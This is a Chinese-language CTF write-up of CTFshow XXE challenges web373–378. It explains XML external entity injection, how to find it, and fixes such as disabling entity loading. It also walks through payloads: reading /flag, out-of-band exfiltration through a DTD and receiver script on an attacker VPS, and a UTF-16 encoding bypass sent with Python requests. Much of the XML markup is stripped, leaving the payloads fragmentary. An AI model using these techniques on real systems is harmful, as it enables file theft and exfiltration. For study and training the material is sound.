CTFshow_Web_XXE
CTFshow_Web_XXE
知识点:
1、XML&XXE-原理&发现&利用&修复等 2、XML&XXE-黑盒模式下的发现与利用 3、XML&XXE-白盒模式下的审计与利用 4、XML&XXE-无回显&伪协议&产生层面
思路点:
参考:https://www.cnblogs.com/20175211lyz/p/11413335.html -XXE黑盒发现: 1、获取得到Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试 2、不管获取的Content-Type类型或数据传输类型,均可尝试修改后提交测试xxe 3、XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行 -XXE白盒发现: 1、可通过应用功能追踪代码定位审计 2、可通过脚本特定函数搜索定位审计 3、可通过伪协议玩法绕过相关修复等
详细点: XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
XML 与 HTML 的主要差异: XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息 ,而 XML 旨在传输信息。
XXE修复防御方案:
-方案1-禁用外部实体 PHP: libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false); Python: from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
-方案2-过滤用户提交的XML数据 过滤关键词:
web373
flagl路径是/flag
loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
// 把 DOM 节点转换为 SimpleXMLElement 对象
$creds = simplexml_import_dom($dom);
// 节点嵌套
$ctfshow = $creds->ctfshow;
echo $ctfshow;
}
highlight_file(__FILE__); payload
使用post请求
]>
&xxe;
web374-376
loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__); 过滤了 看了web376,正则加了 i ,那上一题应该是大写绕过
payload
首先vps创建pd.dtd文件
">
然后在创建xxe.php接受flag
然后使用burp修改成post请求
%remote;%int;%send;
]>web377
loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);
这次增加了http的过滤,可用编码进行绕过import requests
url = "http://75cca4df-23bf-4424-90df-f32974fb10b9.challenge.ctf.show/"
payload = """
%remote;%int;%send;
]>
"""
payload = payload.encode('utf-16')
requests.post(url ,data=payload)web378
抓包发现传输是xml形式,直接读取问阿金
]>
&f;
admin